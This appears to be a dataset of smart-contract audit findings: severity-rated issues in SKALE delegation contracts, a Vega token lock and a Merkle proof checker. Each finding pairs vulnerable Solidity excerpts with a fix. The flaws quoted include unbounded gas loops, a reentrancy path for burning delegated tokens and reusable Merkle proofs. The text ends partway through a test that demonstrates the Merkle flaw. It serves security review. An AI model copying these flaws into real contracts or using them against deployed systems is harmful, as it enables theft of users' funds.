amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n\\nThis problem is major because delegations number is growing over time and may even potentially grow more than the gas limit and lock all tokens forever. `getLockedCount` is called during every transfer which makes any token transfer much more expensive than it should be.чRemove iterations over a potentially unlimited amount of tokens. All the necessary data can be precalculated before and `getLockedCount` function can have O(1) complexity.чч```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n -Tokens are unlocked only when delegation endsчhighчAfter the first 3 months since at least 50% of tokens are delegated, all tokens should be unlocked. In practice, they are only unlocked if at least 50% of tokens, that were bought on the initial launch, are undelegated.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\nчImplement lock mechanism according to the legal requirement.чч```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n -Tokens after delegation should not be unlocked automaticallyчhighчWhen some amount of tokens are delegated to a validator when the delegation period ends, these tokens are unlocked. However these tokens should be added to `_purchased` as they were in that state before their delegation.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\nчTokens should only be unlocked if the main legal requirement `(_totalDelegated[holder] >= _purchased[holder])` is satisfied, which in the above case this has not happened.чч```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n -Some unlocked tokens can become locked after delegation is rejectedчhighчWhen some amount of tokens are requested to be delegated to a validator, the validator can reject the request. The previous status of these tokens should be intact and not changed (locked or unlocked).\\nHere the initial status of tokens gets stored and it's either completely `locked` or unlocked:\\n```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n\\nThe problem is that if some amount of these tokens are locked at the time of the request and the rest tokens are unlocked, they will all be considered as locked after the delegation was rejected.\\n```\\nfunction \\_cancel(uint delegationId, DelegationController.Delegation memory delegation) internal returns (State state) {\\n if (\\_isPurchased[delegationId]) {\\n state = purchasedProposedToPurchased(delegationId, delegation);\\n } else {\\n state = proposedToUnlocked(delegationId);\\n }\\n}\\n```\\nчDon't change the status of the rejected tokens.чч```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n -Gas limit for bounty and slashing distributionчhighчAfter every bounty payment (should be once per month) to a validator, the bounty is distributed to all delegators. In order to do that, there is a `for` loop that iterates over all active delegators and sends their bounty to `SkaleBalances` contract:\\n```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n\\nThere are also few more loops over all the active delegators. This leads to a huge gas cost of distribution mechanism. A number of active delegators that can be processed before hitting the gas limit is limited and not big enough.\\nThe same issue is with slashing:\\n```\\nfunction slash(uint validatorId, uint amount) external allow(\"SkaleDKG\") {\\n ValidatorService validatorService = ValidatorService(contractManager.getContract(\"ValidatorService\"));\\n require(validatorService.validatorExists(validatorId), \"Validator does not exist\");\\n\\n Distributor distributor = Distributor(contractManager.getContract(\"Distributor\"));\\n TokenState tokenState = TokenState(contractManager.getContract(\"TokenState\"));\\n\\n Distributor.Share[] memory shares = distributor.distributePenalties(validatorId, amount);\\n for (uint i = 0; i < shares.length; ++i) {\\n tokenState.slash(shares[i].delegationId, shares[i].amount);\\n }\\n}\\n```\\nчThe best solution would require major changes to the codebase, but would eventually make it simpler and safer. Instead of distributing and centrally calculating bounty for each delegator during one call it's better to just store all the necessary values, so delegator would be able to calculate the bounty on withdrawal. Amongst the necessary values, there should be history of total delegated amounts per validator during each bounty payment and history of all delegations with durations of their active state.чч```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n -Delegations might stuck in non-active validator PendingчmediumчIf a validator does not get enough funds to run a node (MSR - Minimum staking requirement), all token holders that delegated tokens to the validator cannot switch to a different validator, and might result in funds getting stuck with the nonfunctioning validator for up to 12 months.\\nExample\\n```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, \"Validator has to meet Minimum Staking Requirement\");\\n```\\nчResolution\\nSkale team acknowledged this issue and will address this in future versions.\\nAllow token holders to withdraw delegation earlier if the validator didn't get enough funds for running nodes.чч```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, \"Validator has to meet Minimum Staking Requirement\");\\n```\\n -Disabled Validators still have delegated funds PendingчmediumчThe owner of `ValidatorService` contract can enable and disable validators. The issue is that when a validator is disabled, it still has its delegations, and delegated funds will be locked until the end of their delegation period (up to 12 months).\\n```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\nчIt might make sense to release all delegations and stop validator's nodes if it's not trusted anymore. However, the rationale behind disabling the validators might be different that what we think, in any case there should be a way to handle this scenario, where the validator is disabled but there are funds delegated to it.чч```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\n -_endingDelegations list is redundantчmediumч`_endingDelegations` is a list of delegations that is created for optimisation purposes. But the only place it's used is in `getPurchasedAmount` function, so only a subset of all delegations is going to be updated.\\n```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n\\nBut `getPurchasedAmount` function is mostly used after iterating over all delegations of the holder.чResolution\\nIssue is fixed as a part of the major code changes in skalenetwork/skale-manager#92\\nRemove `_endingDelegations` and switch to a mechanism that does not require looping through delegations list of potentially unlimited size.чч```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n -Some functions are defined but not implementedчmediumчThere are many functions that are defined but not implemented. They have a revert with a message as not implemented.\\nThis results in complex code and reduces readability. Here is a some of these functions within the scope of this audit:\\n```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n```\\nчIf these functions are needed for this release, they must be implemented. If they are for future plan, it's better to remove the extra code in the smart contracts.чч```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(\"Not implemented\");\\n}\\n```\\n -tokenState.setState redundant checksчmediumч`tokenState.setState` is used to change the state of the token from:\\nPROPOSED to ACCEPTED (in accept())\\nDELEGATED to ENDING_DELEGATED (in `requestUndelegation()`\\nThe if/else statement in `setState` is too complicated and can be simplified, both to optimize gas usage and to increase readability.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(\"TimeHelpers\"));\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n\\n require(newState != State.PROPOSED, \"Can't set state to proposed\");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = getState(delegationId);\\n require(currentState == State.PROPOSED, \"Can't set state to accepted\");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(\"Can't set state to delegated\");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, \"Can't set state to ending delegated\");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(\"Unknown state\");\\n }\\n}\\n```\\nчSome of the changes that do not change the functionality of the `setState` function:\\nRemove `reverts()` and add the valid states to the `require()` at the beginning of the function\\nRemove multiple calls to `getState()`\\nRemove final else/revert as this is an internal function and States passed should be valid More optimization can be done which requires further understanding of the system and the state machine.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(\"TimeHelpers\"));\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n\\n require(newState != State.PROPOSED || newState != State.DELEGATED, \"Invalid state change\");\\n State currentState = getState(delegationId);\\n\\n if (newState == State.ACCEPTED) {\\n require(currentState == State.PROPOSED, \"Can't set state to accepted\");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(currentState == State.DELEGATED, \"Can't set state to ending delegated\");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n }\\n }\\n```\\nчч```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(\"TimeHelpers\"));\\n DelegationController delegationController = DelegationController(contractManager.getContract(\"DelegationController\"));\\n\\n require(newState != State.PROPOSED, \"Can't set state to proposed\");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = getState(delegationId);\\n require(currentState == State.PROPOSED, \"Can't set state to accepted\");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(\"Can't set state to delegated\");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, \"Can't set state to ending delegated\");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(\"Unknown state\");\\n }\\n}\\n```\\n -Users can burn delegated tokens using re-entrancy attackчhighчWhen a user burns tokens, the following code is called:\\n```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), \"Token should be unlocked for burning\");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n\\nThere is a callback function right after the check that there are enough unlocked tokens to burn. In this callback, the user can delegate all the tokens right before burning them without breaking the code flow.чResolution\\nMitigated in skalenetwork/skale-manager#128\\n`_callTokensToSend` should be called before checking for the unlocked amount of tokens, which is better defined as Checks-Effects-Interactions Pattern.чч```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), \"Token should be unlocked for burning\");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n -Rounding errors after slashingчhighчWhen slashing happens `_delegatedToValidator` and `_effectiveDelegatedToValidator` values are reduced.\\n```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n\\nWhen holders process slashings, they reduce `_delegatedByHolderToValidator`, `_delegatedByHolder`, `_effectiveDelegatedByHolderToValidator` values.\\n```\\nif (oldValue > 0) {\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n reduce(\\n \\_effectiveDelegatedByHolderToValidator[holder][validatorId],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId, month));\\n}\\n```\\n\\nAlso when holders are undelegating, they are calculating how many tokens from `delegations[delegationId].amount` were slashed.\\n```\\nuint amountAfterSlashing = calculateDelegationAmountAfterSlashing(delegationId);\\n```\\n\\nAll these values should be calculated one from another, but they all will have different rounding errors after slashing. For example, the assumptions that the total sum of all delegations from holder `X` to validator `Y` should still be equal to `_delegatedByHolderToValidator[X][Y]` is not true anymore. The problem is that these assumptions are still used. For example, when undelegating some delegation with delegated `amount` equals amount(after slashing), the holder will reduce `_delegatedByHolderToValidator[X][Y]`, `_delegatedByHolder[X]` and `_delegatedToValidator[Y]` by `amount`. Since rounding errors of all these values are different that will lead to 2 possible scenarios:\\nIf rounding error reduces `amount` not that much as other values, we can have `uint` underflow. This is especially dangerous because all calculations are delayed and we will know about underflow and `SafeMath` revert in the next month or later.\\nDevelopers already made sure that rounding errors are aligned in a correct way, and that the reduced value should always be larger than the subtracted, so there should not be underflow. This solution is very unstable because it's hard to verify it and keep in mind even during a small code change. 2. If rounding errors make `amount` smaller then it should be, when other values should be zero (for example, when all the delegations are undelegated), these values will become some very small values. The problem here is that it would be impossible to compare values to zero.чConsider not calling `revert` on these subtractions and make result value be equals to zero if underflow happens.\\nConsider comparing to some small `epsilon` value instead of zero. Or similar to the previous point, on every subtraction check if the value is smaller then `epsilon`, and make it zero if it is.чч```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n -Slashes do not affect bounty distributionчhighчWhen slashes are processed by a holder, only `_delegatedByHolderToValidator` and `_delegatedByHolder` values are reduced. But `_effectiveDelegatedByHolderToValidator` value remains the same. This value is used to distribute bounties amongst delegators. So slashing will not affect that distribution.\\n```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\nчReduce `_effectiveDelegatedByHolderToValidator` and `_effectiveDelegatedToValidator` when slashes are processed.чч```\\nuint oldValue = getAndUpdateDelegatedByHolderToValidator(holder, validatorId);\\nif (oldValue > 0) {\\n uint month = \\_slashes[index].month;\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId));\\n}\\n```\\n -Storage operations optimizationчmediumчThere are a lot of operations that write some value to the storage (uses `SSTORE` opcode) without actually changing it.\\nIn `getAndUpdateValue` function of `DelegationController` and TokenLaunchLocker:\\n```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n\\nIn `handleSlash` function of `Punisher` contract `amount` will be zero in most cases:\\n```\\nfunction handleSlash(address holder, uint amount) external allow(\"DelegationController\") {\\n \\_locked[holder] = \\_locked[holder].add(amount);\\n}\\n```\\nчResolution\\nMitigated in skalenetwork/skale-manager#179\\nCheck if the value is the same and don't write it to the storage in that case.чч```\\nfor (uint i = sequence.firstUnprocessedMonth; i <= month; ++i) {\\n sequence.value = sequence.value.add(sequence.addDiff[i]).sub(sequence.subtractDiff[i]);\\n delete sequence.addDiff[i];\\n delete sequence.subtractDiff[i];\\n}\\n```\\n -Function overloadingчlowчSome functions in the codebase are overloaded. That makes code less readable and increases the probability of missing bugs.\\nFor example, there are a lot of `reduce` function implementations in DelegationController:\\n```\\nfunction reduce(PartialDifferencesValue storage sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (hasSumSequence) {\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\nчResolution\\nFixed in skalenetwork/skale-manager#181\\nAvoid function overloading as a general guideline.чч```\\nfunction reduce(PartialDifferencesValue storage sequence, uint amount, uint month) internal returns (Fraction memory) {\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return createFraction(0);\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return createFraction(0);\\n }\\n\\n uint \\_amount = amount;\\n if (value < amount) {\\n \\_amount = value;\\n }\\n\\n Fraction memory reducingCoefficient = createFraction(value.sub(\\_amount), value);\\n reduce(sequence, reducingCoefficient, month);\\n return reducingCoefficient;\\n}\\n\\nfunction reduce(PartialDifferencesValue storage sequence, Fraction memory reducingCoefficient, uint month) internal {\\n reduce(\\n sequence,\\n sequence,\\n reducingCoefficient,\\n month,\\n false);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n reduce(\\n sequence,\\n sumSequence,\\n reducingCoefficient,\\n month,\\n true);\\n}\\n\\nfunction reduce(\\n PartialDifferencesValue storage sequence,\\n PartialDifferencesValue storage sumSequence,\\n Fraction memory reducingCoefficient,\\n uint month,\\n bool hasSumSequence) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n if (hasSumSequence) {\\n require(month.add(1) >= sumSequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n }\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n uint newValue = sequence.value.mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n subtract(sumSequence, sequence.value.sub(newValue), month);\\n }\\n sequence.value = newValue;\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n uint newDiff = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n if (hasSumSequence) {\\n sumSequence.subtractDiff[i] = sumSequence.subtractDiff[i].sub(sequence.subtractDiff[i].sub(newDiff));\\n }\\n sequence.subtractDiff[i] = newDiff;\\n }\\n}\\n\\nfunction reduce(\\n PartialDifferences storage sequence,\\n Fraction memory reducingCoefficient,\\n uint month) internal\\n{\\n require(month.add(1) >= sequence.firstUnprocessedMonth, \"Can't reduce value in the past\");\\n require(reducingCoefficient.numerator <= reducingCoefficient.denominator, \"Increasing of values is not implemented\");\\n if (sequence.firstUnprocessedMonth == 0) {\\n return;\\n }\\n uint value = getAndUpdateValue(sequence, month);\\n if (value == 0) {\\n return;\\n }\\n\\n sequence.value[month] = sequence.value[month].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n\\n for (uint i = month.add(1); i <= sequence.lastChangedMonth; ++i) {\\n sequence.subtractDiff[i] = sequence.subtractDiff[i].mul(reducingCoefficient.numerator).div(reducingCoefficient.denominator);\\n }\\n}\\n```\\n -ERC20Lockable - inconsistent locking statusчlowч`Vega_Token.is_tradable()` will incorrectly return `false` if the token is never manually unlocked by the owner but `unlock_time` has passed, which will automatically unlock trading.\\n```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\nчdeclare `_is_locked` as `private` instead of `public`\\ncreate a getter method that correctly returns the locking status\\n```\\nfunction \\_isLocked() internal view {\\n return !\\_is\\_locked || now > unlock\\_date;\\n}\\n```\\n\\nmake `modifier onlyUnlocked()` use the newly created getter (_isLocked())\\nmake `Vega_Token.is_tradeable()` use the newly created getter (_isLocked())\\n`_unlock()` should raise an errorcondition when called on an already unlocked contract\\nit could make sense to emit a “contract hast been unlocked” event for auditing purposesчч```\\n/\\*\\*\\n \\* @dev locked status, only applicable before unlock\\_date\\n \\*/\\nbool public \\_is\\_locked = true;\\n\\n/\\*\\*\\n \\* @dev Modifier that only allows function to run if either token is unlocked or time has expired.\\n \\* Throws if called while token is locked.\\n \\*/\\nmodifier onlyUnlocked() {\\n require(!\\_is\\_locked || now > unlock\\_date);\\n \\_;\\n}\\n\\n/\\*\\*\\n \\* @dev Internal function that unlocks token. Can only be ran before expiration (give that it's irrelevant after)\\n \\*/\\nfunction \\_unlock() internal {\\n require(now <= unlock\\_date);\\n \\_is\\_locked = false;\\n```\\n -Merkle.checkMembership allows existence proofs for the same leaf in multiple locations in the treeчhighч`checkMembership` is used by several contracts to prove that transactions exist in the child chain. The function uses a `leaf`, an `index`, and a `proof` to construct a hypothetical root hash. This constructed hash is compared to the passed in `rootHash` parameter. If the two are equivalent, the `proof` is considered valid.\\nThe proof is performed iteratively, and uses a pseudo-index (j) to determine whether the next proof element represents a “left branch” or “right branch”:\\n```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n\\nIf `j` is even, the computed hash is placed before the next proof element. If `j` is odd, the computed hash is placed after the next proof element. After each iteration, `j` is decremented by `j` = `j` / 2.\\nBecause `checkMembership` makes no requirements on the height of the tree or the size of the proof relative to the provided `index`, it is possible to pass in invalid values for `index` that prove a leaf's existence in multiple locations in the tree.\\nBy modifying existing tests, we showed that for a tree with 3 leaves, leaf 2 can be proven to exist at indices 2, 6, and 10 using the same proof each time. The modified test can be found here: https://gist.github.com/wadeAlexC/01b60099282a026f8dc1ac85d83489fd#file-merkle-test-js-L40-L67\\n```\\nit('should accidentally allow different indices to use the same proof', async () => {\\n const rootHash = this.merkleTree.root;\\n const proof = this.merkleTree.getInclusionProof(leaves[2]);\\n\\n const result = await this.merkleContract.checkMembership(\\n leaves[2],\\n 2,\\n rootHash,\\n proof,\\n );\\n expect(result).to.be.true;\\n\\n const nextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 6,\\n rootHash,\\n proof,\\n );\\n 